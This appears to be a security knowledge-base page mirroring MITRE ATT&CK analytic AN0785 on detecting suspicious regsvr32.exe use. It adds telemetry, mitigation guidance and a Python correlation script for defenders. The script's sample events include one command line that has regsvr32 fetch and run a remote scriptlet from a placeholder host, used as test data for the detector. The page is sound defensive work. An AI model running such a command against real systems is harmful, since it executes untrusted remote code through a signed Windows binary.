AN0785: Analytic 0785
Detection focuses on identifying anomalous regsvr32.exe executions that deviate from normal administrative or system use. Defenders may observe regsvr32.exe loading scriptlets or DLLs from unusual paths (especially temporary directories or remote URLs), command-line arguments invoking /i or /u with suspicious file references, network connections initiated by regsvr32.exe, and unsigned or untrusted DLLs being loaded shortly after regsvr32.exe invocation. Correlated sequences include regsvr32.exe process creation, module load of DLL/scriptlet, and optional outbound network traffic.
Analyst context for executives and security teams
This analytic matters because regsvr32.exe is a legitimate Windows utility, so suspicious use can blend into normal administration. The business decision value is whether the organization can distinguish expected system or admin activity from unusual executions that load scriptlets or DLLs from risky locations, use suspicious command-line switches, or initiate network connections.
Executive priority
Prioritize this as a Windows endpoint and SOC readiness validation item. Leaders should ask whether endpoint telemetry captures process creation, command-line arguments, module loads, file trust/signature context, and outbound network activity for regsvr32.exe. The main risk is not the tool itself, but blind spots that allow suspicious signed-binary activity to look like routine administration, weakening incident triage and audit evidence.
Technical view
For Windows environments, validate detections around anomalous regsvr32.exe execution. Focus on deviations from known administrative or system baselines: loading DLLs or scriptlets from unusual paths such as temporary directories, references to remote URLs, use of /i or /u with suspicious file references, outbound network connections by regsvr32.exe, and unsigned or untrusted DLL loads shortly after process start. Correlate process creation, command-line data, module load events, file path and signature metadata, and optional network telemetry.
Likely telemetry
- Windows process creation events for regsvr32.exe
- Full command-line arguments, including /i and /u usage
- Module load telemetry for DLLs or scriptlets loaded after regsvr32.exe starts
- File path metadata, especially temporary directories or unusual locations
- Digital signature or trust information for loaded DLLs
Detection direction
- Baseline legitimate administrative and system use of regsvr32.exe before tuning alerts.
- Alert on regsvr32.exe loading content from unusual paths, temporary directories, or remote URLs where telemetry supports it.
- Correlate process creation with subsequent DLL or scriptlet loads and any outbound network activity.
- Tune for false positives from software installation, system administration, and application registration workflows.
- Validate that telemetry preserves parent process, command line, loaded module, path, signature, and network context; missing fields will materially reduce analytic value.
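As an added example that is not part of the MITRE analytic or of Glexia's page, the Python below applies the analytic description and the detection direction above to a handful of constructed process-creation, module-load and network-connection events: it keys the three event types to the regsvr32.exe process, checks the command line for remote or temporary-directory references used with /i or /u, checks module loads shortly after start for unsigned or unusual-path DLLs, and flags any outbound connection. The event field names, the expected-directory baseline, the 30-second module window and the sample command lines are all assumptions rather than any vendor's schema; a real pipeline would key on the EDR's process GUID instead of the pid and would tune the baseline as the first bullet says.

```python
"""Correlate Windows telemetry for anomalous regsvr32.exe activity (added example)."""
import re
from datetime import datetime, timedelta

# Constructed baseline: directories from which installer- or admin-driven
# regsvr32.exe registrations are expected in this environment (assumption).
EXPECTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\system32\\")
# Temporary or user-writable locations that the analytic treats as unusual.
UNUSUAL_DIR_RE = re.compile(r"\\(temp|tmp|downloads|public)\\", re.IGNORECASE)
# Remote references: URLs or UNC paths, at token start or after "/i:".
REMOTE_RE = re.compile(r"(?:^|\s|:)(?:https?://|ftp://|\\\\[\w.-]+\\)", re.IGNORECASE)
# /i or /u switches (optionally /i:<ref>), matched as whole tokens.
SWITCH_RE = re.compile(r"(?:^|\s)/[iu](?::|\s|$)", re.IGNORECASE)
# Module loads inside this window are attributed to the process start-up (assumption).
MODULE_WINDOW = timedelta(seconds=30)

# Constructed sample telemetry, not real events: one baseline registration from
# an installer, one DLL registered out of a temp directory, one remote scriptlet.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4101, "ts": "2024-05-01T10:00:00", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\System32\msiexec.exe", "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"type": "module", "pid": 4101, "ts": "2024-05-01T10:00:01", "path": r"C:\Program Files\Vendor\vendor.dll", "signed": True},
    {"type": "process", "pid": 5222, "ts": "2024-05-01T10:05:00", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": r"regsvr32.exe /s C:\Users\user\AppData\Local\Temp\setup1.dll"},
    {"type": "module", "pid": 5222, "ts": "2024-05-01T10:05:02", "path": r"C:\Users\user\AppData\Local\Temp\setup1.dll", "signed": False},
    {"type": "process", "pid": 6303, "ts": "2024-05-01T10:09:00", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": r"regsvr32.exe /s /u /i:http://example.invalid/update.sct"},
    {"type": "network", "pid": 6303, "ts": "2024-05-01T10:09:01", "dest": "example.invalid:80"},
]


def _in_expected_dir(path):
    return path.lower().startswith(EXPECTED_DIRS)


def _file_refs(cmdline):
    """Return the file or URL references on a regsvr32 command line: every token
    that is neither the executable nor a bare switch; /i:<ref> yields <ref>."""
    refs = []
    for quoted, bare in re.findall(r'"([^"]+)"|(\S+)', cmdline):
        tok = quoted or bare
        if tok.lower().endswith("regsvr32.exe") or re.fullmatch(r"/[a-z]", tok, re.IGNORECASE):
            continue
        tok = re.sub(r"^/[iu]:", "", tok, flags=re.IGNORECASE)
        if tok:
            refs.append(tok)
    return refs


def cmdline_reasons(cmdline):
    """Command-line indicators from the analytic: remote references, unusual
    paths, and /i or /u combined with a suspicious file reference."""
    refs = _file_refs(cmdline)
    remote = [r for r in refs if REMOTE_RE.search(r)]
    unusual = [r for r in refs if UNUSUAL_DIR_RE.search(r)]
    scriptlets = [r for r in refs if r.lower().endswith(".sct")]
    reasons = []
    if remote:
        reasons.append(f"remote reference: {remote[0]}")
    if unusual:
        reasons.append(f"unusual path: {unusual[0]}")
    if SWITCH_RE.search(cmdline) and (remote or unusual or scriptlets):
        reasons.append("/i or /u used with a suspicious file reference")
    return reasons


def assess(events):
    """Correlate process, module and network events by pid. Returns
    {pid: {"cmdline", "parent", "reasons"}} for regsvr32.exe processes that
    deviate from the baseline; baseline registrations produce no entry."""
    procs = {}
    for e in events:
        if e["type"] == "process" and e["image"].lower().endswith("\\regsvr32.exe"):
            procs[e["pid"]] = {"start": datetime.fromisoformat(e["ts"]), "cmdline": e["cmdline"],
                               "parent": e["parent"], "reasons": cmdline_reasons(e["cmdline"])}
    for e in sorted(events, key=lambda x: x["ts"]):
        p = procs.get(e["pid"])
        if p is None or e["type"] == "process":
            continue
        if e["type"] == "module":
            delta = datetime.fromisoformat(e["ts"]) - p["start"]
            if timedelta(0) <= delta <= MODULE_WINDOW:
                if not e["signed"] and not _in_expected_dir(e["path"]):
                    p["reasons"].append(f"unsigned module loaded from {e['path']}")
                elif UNUSUAL_DIR_RE.search(e["path"]):
                    p["reasons"].append(f"module loaded from unusual path {e['path']}")
        elif e["type"] == "network":
            # Any outbound connection by regsvr32.exe is a deviation from the baseline.
            p["reasons"].append(f"outbound connection to {e['dest']}")
    return {pid: {k: v for k, v in p.items() if k != "start"} for pid, p in procs.items() if p["reasons"]}


if __name__ == "__main__":
    for pid, finding in assess(SAMPLE_EVENTS).items():
        print(pid, finding["parent"], finding["cmdline"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The parent process is carried into each finding rather than scored, matching the note above that telemetry must preserve lineage for triage; the installer-driven registration from a signed DLL under Program Files produces no finding, which is the false-positive class the tuning bullet calls out.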
Mitigation priorities
- Ensure Windows endpoint logging captures process creation, command line, module load, file trust, and network connection context.
- Restrict or monitor unnecessary regsvr32.exe usage where business operations allow.
- Harden administrative workflows so expected regsvr32.exe activity is documented and distinguishable from anomalous use.
- Use allowlisting or trust-based controls for DLL/scriptlet loading where feasible, without disrupting legitimate system registration tasks.
- Include this behavior in incident response playbooks so analysts know how to collect process lineage, loaded modules, file provenance, and network evidence.
Analyst notes and limits
The supplied object is a detection analytic, not a technique entry, and no relationship context was supplied. This analysis is therefore centered on the official analytic description: anomalous regsvr32.exe execution on Windows, suspicious arguments, unusual load paths, remote references, untrusted DLLs, and correlated process/module/network sequences.
Official detection logic was not provided, tactics were not specified, and no related techniques, software, groups, mitigations, or data components were supplied. Local baselines and telemetry availability are required to determine alert thresholds, false positives, and operational coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | d3a6a57ba037… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack: AN0785
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.